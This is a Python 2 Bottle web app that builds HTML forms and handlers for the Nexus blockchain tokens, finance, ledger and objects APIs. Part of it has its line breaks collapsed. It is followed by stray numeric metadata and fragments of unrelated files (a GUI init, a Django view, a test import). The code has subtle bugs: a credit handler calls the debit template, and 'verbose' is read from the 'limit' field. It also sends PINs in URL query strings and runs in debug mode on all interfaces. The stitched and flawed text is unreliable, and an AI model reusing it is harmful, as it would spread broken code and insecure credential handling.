return(output) output = sdk.nexus_tokens_get_token_by_name(name) genid = sdk.genesis_id else: output = curl(tokens_get_token_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-token-address', method="post") def do_tokens_get_token_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("tokens/get/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_token_by_address(address) genid = sdk.genesis_id else: output = curl(tokens_get_token_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-account-name', method="post") def do_tokens_get_account_name(): session = bottle.request.forms.get("session") name = bottle.request.forms.get("name") if (no_parms(session, name)): m = red("tokens/get/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_account_by_name(name) genid = sdk.genesis_id else: output = curl(tokens_get_account_name.format("", session, name, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-get-account-address', method="post") def do_tokens_get_account_address(): session = bottle.request.forms.get("session") address = bottle.request.forms.get("address") if (no_parms(session, address)): m = red("tokens/get/account needs more input parameters") return(show(m, session)) #endif action 
= bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_get_account_by_address(address) genid = sdk.genesis_id else: output = curl(tokens_get_account_address.format("", session, address, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-debit-token', method="post") def do_tokens_debit_token(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") name_to = bottle.request.forms.get("name_to") if (no_parms(pin, session, amount, name, name_to)): return(show(red("tokens/debit/token needs more input parameters"), session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_debit_token_by_name(name, name_to, amount) genid = sdk.genesis_id else: output = curl(tokens_debit_token.format("", pin, session, name, name_to, amount, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-credit-token', method="post") def do_tokens_credit_token(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") txid = bottle.request.forms.get("txid") if (no_parms(pin, session, name, amount, txid)): m = red("tokens/credit/token needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_credit_token_by_name(name, amount, txid) genid = sdk.genesis_id else: output = 
curl(tokens_debit_account.format("", pin, session, name, amount, txid, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-debit-account', method="post") def do_tokens_debit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") name_to = bottle.request.forms.get("name_to") if (no_parms(pin, session, amount, name, name_to)): m = red("tokens/debit/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_debit_account_by_name(name, name_to, amount) genid = sdk.genesis_id else: output = curl(tokens_debit_account.format("", pin, session, amount, name, name_to, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/tokens-credit-account', method="post") def do_tokens_credit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") amount = bottle.request.forms.get("amount") name = bottle.request.forms.get("name") name_proof = bottle.request.forms.get("name_proof") if (no_parms(pin, session, txid, amount, name, name_proof)): m = red("tokens/credit/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_tokens_credit_account_by_name(name, amount, txid) genid = sdk.genesis_id else: output = curl(tokens_credit_account.format("", pin, session, txid, amount, name, name_proof, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, 
genid)) #enddef

#------------------------------------------------------------------------------
#
# build_finance_html
#
# URL templates for the Nexus Finance API. The leading "{}" takes the node
# URL prefix (empty string when curl() adds it) and the trailing "{}" takes
# any URL suffix.
#
finance_create_account = '{}finance/create/account?pin={}&session={}&name={}{}'
finance_get_account_name = '{}finance/get/account?session={}&name={}{}'
finance_get_account_address = '{}finance/get/account?session={}&address={}{}'
finance_debit_account = ('{}finance/debit/account?pin={}&session={}' + \
    '&amount={}&name_from={}&name_to={}{}')
finance_credit_account = ('{}finance/credit/account?pin={}&session={}' + \
    '&txid={}&amount={}&name_to={}&name_proof={}{}')
finance_list_accounts = '{}finance/list/accounts?session={}{}'
finance_get_stakeinfo = '{}finance/get/stakeinfo?session={}{}'
finance_set_stake = '{}finance/set/stake?pin={}&session={}&amount={}{}'

def build_finance_html(sid, genid, o):

    #
    # Append one HTML form (table row) per Finance API call to page body
    # string o and return the extended string. sid pre-populates the
    # "session" field of each form; genid is accepted for signature parity
    # with the other build_*_html helpers.
    #
    f = form_footer
    o += "<br><b>Finance API</b><br><br><table>"

    o += "<tr><td>"
    h = "finance-get-account-name"
    h = form_header.format(h)
    session = form_parm.format("session", sid)
    name = form_parm.format("name", "")
    o += hl(finance_get_account_name).format(h, session, name, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = "finance-get-account-address"
    h = form_header.format(h)
    session = form_parm.format("session", sid)
    address = form_parm.format("address", "")
    o += hl(finance_get_account_address).format(h, session, address, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = form_header.format("finance-create-account")
    pin = form_parm.format("pin", "")
    session = form_parm.format("session", sid)
    name = form_parm.format("name", "")
    o += hl(finance_create_account).format(h, pin, session, name, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = form_header.format("finance-debit-account")
    pin = form_parm.format("pin", "")
    session = form_parm.format("session", sid)
    amount = form_parm.format("amount", "")
    name_from = form_parm.format("name_from", "")
    name_to = form_parm.format("name_to", "")
    o += hl(finance_debit_account).format(h, pin, session, amount, name_from,
        name_to, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = form_header.format("finance-credit-account")
    pin = form_parm.format("pin", "")
    session = form_parm.format("session", sid)
    txid = form_parm.format("txid", "")
    amount = form_parm.format("amount", "")
    name_to = form_parm.format("name_to", "")
    proof = form_parm.format("name_proof", "")
    o += hl(finance_credit_account).format(h, pin, session, txid, amount,
        name_to, proof, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = form_header.format("finance-get-stakeinfo")
    session = form_parm.format("session", sid)
    o += hl(finance_get_stakeinfo).format(h, session, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = form_header.format("finance-set-stake")
    pin = form_parm.format("pin", "")
    session = form_parm.format("session", sid)
    amount = form_parm.format("amount", "")
    o += hl(finance_set_stake).format(h, pin, session, amount, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = form_header.format("finance-list-accounts")
    session = form_parm.format("session", sid)
    o += hl(finance_list_accounts).format(h, session, f)
    o += "</td></tr>"

    o += '</table><br><hr size="5">'
    return(o)
#enddef

@bottle.route('/finance-get-account-name', method="post")
def do_finance_get_account_name():

    #
    # Handle the finance-get-account-name form post. The "action" field
    # chooses the SDK path when its value contains "SDK", otherwise the
    # raw-API curl path is taken.
    #
    session = bottle.request.forms.get("session")
    name = bottle.request.forms.get("name")
    if (no_parms(session, name)):
        m = red("finance/get/account needs more input parameters")
        return(show(m, session))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(session)
        if (sdk == None): return(output)
        output = sdk.nexus_finance_get_account_by_name(name)
        genid = sdk.genesis_id
    else:
        output = curl(finance_get_account_name.format("", session, name, ""))
        genid = ""
    #endif
    output = json.dumps(output)
    return(show(output, session, genid))
#enddef

@bottle.route('/finance-get-account-address', method="post")
def do_finance_get_account_address():

    #
    # Same as do_finance_get_account_name() but looks the account up by
    # register address instead of by name.
    #
    session = bottle.request.forms.get("session")
    address = bottle.request.forms.get("address")
    if (no_parms(session, address)):
        m = red("finance/get/account needs more input parameters")
        return(show(m, session))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(session)
        if (sdk == None): return(output)
        output = sdk.nexus_finance_get_account_by_address(address)
        genid = sdk.genesis_id
    else:
        output = curl(finance_get_account_address.format("", session, address,
            ""))
        genid = ""
    #endif
    output = json.dumps(output)
    return(show(output, session, genid))
#enddef

@bottle.route('/finance-create-account', method="post")
def do_finance_create_account():

    #
    # Create a finance account named "name". The pin is only needed on the
    # raw-API path; the SDK caches credentials per session.
    #
    pin = bottle.request.forms.get("pin")
    session = bottle.request.forms.get("session")
    name = bottle.request.forms.get("name")
    if (no_parms(pin, session, name)):
        m = red("finance/create/account needs more input parameters")
        return(show(m, session))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(session)
        if (sdk == None): return(output)
        output = sdk.nexus_finance_create_account(name)
        genid = sdk.genesis_id
    else:
        output = curl(finance_create_account.format("", pin, session, name,
            ""))
        genid = ""
    #endif
    output = json.dumps(output)
    return(show(output, session, genid))
#enddef

@bottle.route('/finance-debit-account', method="post")
def do_finance_debit_account():

    #
    # Debit "amount" from account "name_from" and send it to "name_to".
    #
    pin = bottle.request.forms.get("pin")
    session = bottle.request.forms.get("session")
    amount = bottle.request.forms.get("amount")
    name_from = bottle.request.forms.get("name_from")
    name_to = bottle.request.forms.get("name_to")
    if (no_parms(pin, session, amount, name_from, name_to)):
        return(show(red("finance/debit/account needs more input parameters"),
            session))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(session)
        if (sdk == None): return(output)
        output = sdk.nexus_finance_debit_account_by_name(name_from, name_to,
            amount)
        genid = sdk.genesis_id
else: output = curl(finance_debit_account.format("", pin, session, amount, name_from, name_to, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-credit-account', method="post") def do_finance_credit_account(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") txid = bottle.request.forms.get("txid") amount = bottle.request.forms.get("amount") name_to = bottle.request.forms.get("name_to") name_proof = bottle.request.forms.get("name_proof") if (no_parms(pin, session, txid, amount, name_to, name_proof)): m = red("finance/credit/account needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_credit_account_by_name(name_to, amount, txid) genid = sdk.genesis_id else: output = curl(finance_credit_account.format("", pin, session, txid, amount, name_to, name_proof, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-list-accounts', method="post") def do_list_accounts(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("finance/list/acccounts needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_list_accounts() genid = sdk.genesis_id else: output = curl(finance_list_accounts.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-get-stakeinfo', method="post") def do_get_stakeinfo(): session = bottle.request.forms.get("session") if (no_parms(session)): m = red("finance/get/stakeinfo needs more input 
parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_get_stakeinfo() genid = sdk.genesis_id else: output = curl(finance_get_stakeinfo.format("", session, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef @bottle.route('/finance-set-stake', method="post") def do_set_stake(): pin = bottle.request.forms.get("pin") session = bottle.request.forms.get("session") amount = bottle.request.forms.get("amount") if (no_parms(pin, session, amount)): m = red("finance/set/stake needs more input parameters") return(show(m, session)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(session) if (sdk == None): return(output) output = sdk.nexus_finance_set_stake(amount) genid = sdk.genesis_id else: output = curl(finance_set_stake.format("", pin, session, amount, "")) genid = "" #endif output = json.dumps(output) return(show(output, session, genid)) #enddef #------------------------------------------------------------------------------ # # build_ledger_html # ledger_get_blockhash = '{}ledger/get/blockhash?height={}{}' ledger_get_block_height = '{}ledger/get/block?height={}&verbose={}{}' ledger_get_block_hash = '{}ledger/get/block?hash={}&verbose={}{}' ledger_get_transaction = '{}ledger/get/transaction?hash={}&verbose={}{}' ledger_get_mininginfo = '{}ledger/get/mininginfo{}' ledger_submit_transaction = '{}ledger/submit/transaction?data={}{}' ledger_list_blocks_height = \ '{}ledger/list/blocks?height={}&limit={}&verbose={}{}' ledger_list_blocks_hash = '{}ledger/list/blocks?hash={}&limit={}&verbose={}{}' def build_ledger_html(sid, genid, o): f = form_footer o += "<br><b>Ledger API</b><br><br><table>" o += "<tr><td>" h = "ledger-get-transaction" if (sid != ""): h += 
"/{}".format(sid) h = form_header.format(h) hsh = form_parm.format("hash", "") v = form_parm.format("verbose", "1") o += hl(ledger_get_transaction).format(h, hsh, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-get-block-height" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) height = form_parm.format("height", "") v = form_parm.format("verbose", "1") o += hl(ledger_get_block_height).format(h, height, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-get-block-hash" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) hsh = form_parm.format("hash", "") v = form_parm.format("verbose", "1") o += hl(ledger_get_block_hash).format(h, hsh, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-get-blockhash" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) height = form_parm.format("height", "") o += hl(ledger_get_blockhash).format(h, height, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-submit-transaction" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) d = form_parm.format("data", "") o += hl(ledger_submit_transaction).format(h, d, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-list-blocks-height" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) height = form_parm.format("height", "") l = form_parm.format("limit", "100") v = form_parm.format("verbose", "1") o += hl(ledger_list_blocks_height).format(h, height, l, v, f) o += "</td></tr>" o += "<tr><td>" h = "ledger-list-blocks-hash" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) hsh = form_parm.format("hash", "") l = form_parm.format("limit", "100") v = form_parm.format("verbose", "1") o += hl(ledger_list_blocks_hash).format(h, hsh, l, v, f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/ledger-get-blockhash', method="post") @bottle.route('/ledger-get-blockhash/<sid>', method="post") def do_ledger_get_blockhash(sid=""): height = bottle.request.forms.get("height") if 
(no_parms(height)): m = red("ledger/get/blockhash needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_blockhash(height) genid = sdk.genesis_id else: output = curl(ledger_get_blockhash.format("", height, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-get-block-height', method="post") @bottle.route('/ledger-get-block-height/<sid>', method="post") def do_ledger_get_block_height(sid=""): height = bottle.request.forms.get("height") verbose = bottle.request.forms.get("verbose") if (no_parms(height, verbose)): m = red("ledger/get/block needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_block_by_height(height, verbose) genid = sdk.genesis_id else: output = curl(ledger_get_block_height.format("", height, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-get-block-hash', method="post") @bottle.route('/ledger-get-block-hash/<sid>', method="post") def do_ledger_get_block_hash(sid=""): hsh = bottle.request.forms.get("hash") verbose = bottle.request.forms.get("verbose") if (no_parms(hsh, verbose)): m = red("ledger/get/block needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_block_by_hash(hsh, verbose) genid = sdk.genesis_id else: output = curl(ledger_get_block_hash.format("", hsh, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, 
genid)) #enddef @bottle.route('/ledger-get-transaction', method="post") @bottle.route('/ledger-get-transaction/<sid>', method="post") def do_ledger_get_transaction(sid=""): hsh = bottle.request.forms.get("hash") verbose = bottle.request.forms.get("verbose") if (no_parms(hsh, verbose)): m = red("ledger/get/transaction needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_get_transaction(hsh, verbose) genid = sdk.genesis_id else: output = curl(ledger_get_transaction.format("", hsh, verbose, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-submit-transaction', method="post") @bottle.route('/ledger-submit-transaction/<sid>', method="post") def do_ledger_submit_transaction(sid=""): data = bottle.request.forms.get("data") if (no_parms(data)): m = red("ledger/submit/transaction needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_submit_transaction(data) genid = sdk.genesis_id else: output = curl(ledger_submit_transaction.format("", data, "")) genid = "" #endif output = json.dumps(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-list-blocks-height', method="post") @bottle.route('/ledger-list-blocks-height/<sid>', method="post") def do_ledger_list_blocks_height(sid=""): height = bottle.request.forms.get("height") l = bottle.request.forms.get("limit") verbose = bottle.request.forms.get("limit") if (no_parms(height, l, verbose)): m = red("ledger/list/blocks needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if 
(sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_list_blocks_by_height(height, l, verbose) genid = sdk.genesis_id else: output = curl(ledger_list_blocks_height.format("", height, l, verbose, "")) genid = "" #endif output = format_transactions(output) return(show(output, sid, genid)) #enddef @bottle.route('/ledger-list-blocks-hash', method="post") @bottle.route('/ledger-list-blocks-hash/<sid>', method="post") def do_ledger_list_blocks_hash(sid=""): hsh = bottle.request.forms.get("hash") l = bottle.request.forms.get("limit") verbose = bottle.request.forms.get("limit") if (no_parms(hsh, l, verbose)): m = red("ledger/list/blocks needs more input parameters") return(show(m, sid)) #endif action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk, output = sid_to_sdk(sid) if (sdk == None): return(output) output = sdk.nexus_ledger_list_blocks_by_hash(hsh, l, verbose) genid = sdk.genesis_id else: output = curl(ledger_list_blocks_hash.format("", hsh, l, verbose, "")) genid = "" #endif output = format_transactions(output) return(show(output, sid, genid)) #enddef #------------------------------------------------------------------------------ # # build_objects_html # objects_create_schema = ('{}objects/create/schema?pin={}&session={}' +\ '&name={}&format=json&json={}{}') objects_get_schema_name = '{}objects/get/schema?name={}&format=json{}' objects_get_schema_address = '{}objects/get/schema?address={}&format=json{}' def build_objects_html(sid, genid, o): f = form_footer o += "<br><b>Objects API</b><br><br><table>" o += "<tr><td>" h = "objects-get-schema-name" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) name = form_parm.format("name", "") o += hl(objects_get_schema_name).format(h, name, f) o += "</td></tr>" o += "<tr><td>" h = "objects-get-schema-address" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) address = form_parm.format("address", "") 
    o += hl(objects_get_schema_address).format(h, address, f)
    o += "</td></tr>"

    o += "<tr><td>"
    h = "objects-create-schema"
    h = form_header.format(h)
    pin = form_parm.format("pin", "")
    session = form_parm.format("session", sid)
    name = form_parm.format("name", "")
    j = form_parm.format("json", "")
    o += hl(objects_create_schema).format(h, pin, session, name, j, f)
    o += "</td></tr>"

    o += '</table><br><hr size="5">'
    return(o)
#enddef

@bottle.route('/objects-create-schema', method="post")
def do_objects_create_schema():

    #
    # Create an object schema named "name" from the JSON description in
    # the "json" form field.
    #
    pin = bottle.request.forms.get("pin")
    session = bottle.request.forms.get("session")
    name = bottle.request.forms.get("name")
    j = bottle.request.forms.get("json")
    if (no_parms(pin, session, name, j)):
        m = red("objects/create/schema needs more input parameters")
        return(show(m, session))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(session)
        if (sdk == None): return(output)
        output = sdk.nexus_objects_create_schema(name, j)
        genid = sdk.genesis_id
    else:
        output = curl(objects_create_schema.format("", pin, session, name, j,
            ""))
        genid = ""
    #endif
    output = json.dumps(output)
    return(show(output, session, genid))
#enddef

@bottle.route('/objects-get-schema-name', method="post")
@bottle.route('/objects-get-schema-name/<sid>', method="post")
def do_objects_get_schema_name(sid=""):

    #
    # Retrieve an object schema by name.
    #
    name = bottle.request.forms.get("name")
    if (no_parms(name)):
        m = red("objects/get/schema needs more input parameters")
        return(show(m, sid))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(sid)
        if (sdk == None): return(output)
        output = sdk.nexus_objects_get_schema_by_name(name)
        genid = sdk.genesis_id
    else:
        output = curl(objects_get_schema_name.format("", name, ""))
        genid = ""
    #endif
    output = json.dumps(output)
    return(show(output, sid, genid))
#enddef

@bottle.route('/objects-get-schema-address', method="post")
@bottle.route('/objects-get-schema-address/<sid>', method="post")
def do_objects_get_schema_address(sid=""):

    #
    # Retrieve an object schema by register address.
    #
    address = bottle.request.forms.get("address")
    if (no_parms(address)):
        m = red("objects/get/schema needs more input parameters")
        return(show(m, sid))
    #endif

    action = bottle.request.forms.get("action")
    sdk_or_api = (action.find("SDK") != -1)
    if (sdk_or_api):
        sdk, output = sid_to_sdk(sid)
        if (sdk == None): return(output)
        output = sdk.nexus_objects_get_schema_by_address(address)
        genid = sdk.genesis_id
    else:
        output = curl(objects_get_schema_address.format("", address, ""))
        genid = ""
    #endif
    output = json.dumps(output)
    return(show(output, sid, genid))
#enddef

#------------------------------------------------------------------------------
#
# build_body_page
#
# Fill in all API calls into body page.
#
def build_body_page(sid="", genid=""):
    output = ""
    output = build_url_html(output)
    output = build_system_html(sid, genid, output)
    output = build_users_html(sid, genid, output)
    output = build_ledger_html(sid, genid, output)
    output = build_tokens_html(sid, genid, output)
    output = build_assets_html(sid, genid, output)
    output = build_supply_html(sid, genid, output)
    output = build_finance_html(sid, genid, output)

    #
    # Back end for objects API is not done yet. Don't show user.
    #
    # output = build_objects_html(sid, genid, output)

    return(output)
#enddef

@bottle.route('/')
def do_landing():

    #
    # Landing page: render the full API form page with the local hostname
    # and the last SDK/API usernames filled into the banner.
    #
    output = build_body_page()
    hostname = blue(socket.gethostname())
    sdk = blue(nexus_sdk_last_username)
    api = blue(nexus_api_last_username)
    return(landing_page.format(hostname, sdk, api, output))
#enddef

@bottle.route('/url/<api_or_sdk>', method="post")
def do_url(api_or_sdk):

    #
    # Change the node URL used for subsequent API or SDK calls, then
    # re-render the landing page.
    #
    global nexus_api_node, nexus_sdk_node

    url = bottle.request.forms.get("url")
    if (api_or_sdk == "api"):
        nexus_api_node = url
    #endif
    if (api_or_sdk == "sdk"):
        nexus.sdk_change_url(url)
        nexus_sdk_node = url
    #endif

    output = build_body_page()
    hostname = blue(socket.gethostname())
    sdk = blue(nexus_sdk_last_username)
    api = blue(nexus_api_last_username)
    return(landing_page.format(hostname, sdk, api, output))
#enddef

#------------------------------------------------------------------------------
#
# ---------- Main program entry point. ----------
#
# NOTE(review): this file is Python 2 — it uses the print statement and the
# "commands" module (removed in Python 3; use subprocess there).
#
date = commands.getoutput("date")
print "cookbook starting up at {}".format(date)

#
# Run web server.
#
bottle.run(host="0.0.0.0", port=cookbook_port, debug=True)
exit(0)

#------------------------------------------------------------------------------
32.942912
79
0.608204
11,195
85,981
4.506833
0.033497
0.056685
0.078487
0.091569
0.823879
0.780989
0.741705
0.706604
0.684168
0.658659
0
0.002327
0.210326
85,981
2,609
80
32.955539
0.740769
0.056675
0
0.645279
0
0.001043
0.187398
0.076987
0
0
0
0
0
0
null
null
0.007303
0.003652
null
null
0.001043
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
25ad660c2b19cabb23bb404bf035f8e5eb6b271c
48
py
Python
GUI/__init__.py
LANCEREN/Graduation-Design_Py
7c636867efba91cb6a828fb9fd96046d5f844bce
[ "MIT" ]
null
null
null
GUI/__init__.py
LANCEREN/Graduation-Design_Py
7c636867efba91cb6a828fb9fd96046d5f844bce
[ "MIT" ]
4
2021-09-08T01:48:52.000Z
2022-03-12T00:21:26.000Z
GUI/__init__.py
LANCEREN/Graduation-Design_Py
7c636867efba91cb6a828fb9fd96046d5f844bce
[ "MIT" ]
null
null
null
# GUi设计 print("Loading GUI design Module ...")
12
38
0.666667
6
48
5.333333
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
48
4
38
12
0.8
0.104167
0
0
0
0
0.707317
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
d32d495d9fe838f99ae4048f433eb0c411043f83
103
py
Python
DockerIntro/src/DjangoApp/views.py
Py-Himanshu-Patel/Learn-Docker
c8505a9b36c42269e8566c9368657463024a6fa6
[ "MIT" ]
null
null
null
DockerIntro/src/DjangoApp/views.py
Py-Himanshu-Patel/Learn-Docker
c8505a9b36c42269e8566c9368657463024a6fa6
[ "MIT" ]
null
null
null
DockerIntro/src/DjangoApp/views.py
Py-Himanshu-Patel/Learn-Docker
c8505a9b36c42269e8566c9368657463024a6fa6
[ "MIT" ]
null
null
null
from django.shortcuts import render def home(request): return render(request, 'DjangoApp/home.html')
20.6
46
0.786408
14
103
5.785714
0.785714
0
0
0
0
0
0
0
0
0
0
0
0.106796
103
4
47
25.75
0.880435
0
0
0
0
0
0.184466
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
d3827ffa6a2c67ee2f13bb5c08aefe57a24118d4
54
py
Python
tests/core/test_import.py
vaporyproject/eth-rlp
a7f785aaf866ab6a40960034d05cb6439e8a9d74
[ "MIT" ]
13
2018-02-25T06:38:38.000Z
2021-11-04T14:09:39.000Z
tests/core/test_import.py
vaporyproject/eth-rlp
a7f785aaf866ab6a40960034d05cb6439e8a9d74
[ "MIT" ]
5
2018-04-25T23:02:28.000Z
2022-01-23T19:50:37.000Z
tests/core/test_import.py
vaporyproject/eth-rlp
a7f785aaf866ab6a40960034d05cb6439e8a9d74
[ "MIT" ]
13
2018-03-01T21:42:05.000Z
2022-03-28T18:34:20.000Z
def test_import(): import eth_rlp # noqa: F401
10.8
32
0.648148
8
54
4.125
0.875
0
0
0
0
0
0
0
0
0
0
0.075
0.259259
54
4
33
13.5
0.75
0.185185
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0
1
0
1.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
6
d390482b69ab7b0bac12fe13826f4074792a79e4
158
py
Python
gpn/experiments/__init__.py
WodkaRHR/Graph-Posterior-Network
139e7c45c37324c9286e0cca60360a4978b3f411
[ "MIT" ]
23
2021-11-16T01:31:55.000Z
2022-03-04T05:49:03.000Z
gpn/experiments/__init__.py
WodkaRHR/Graph-Posterior-Network
139e7c45c37324c9286e0cca60360a4978b3f411
[ "MIT" ]
1
2021-12-17T01:25:16.000Z
2021-12-20T10:38:30.000Z
gpn/experiments/__init__.py
WodkaRHR/Graph-Posterior-Network
139e7c45c37324c9286e0cca60360a4978b3f411
[ "MIT" ]
7
2021-12-03T11:13:44.000Z
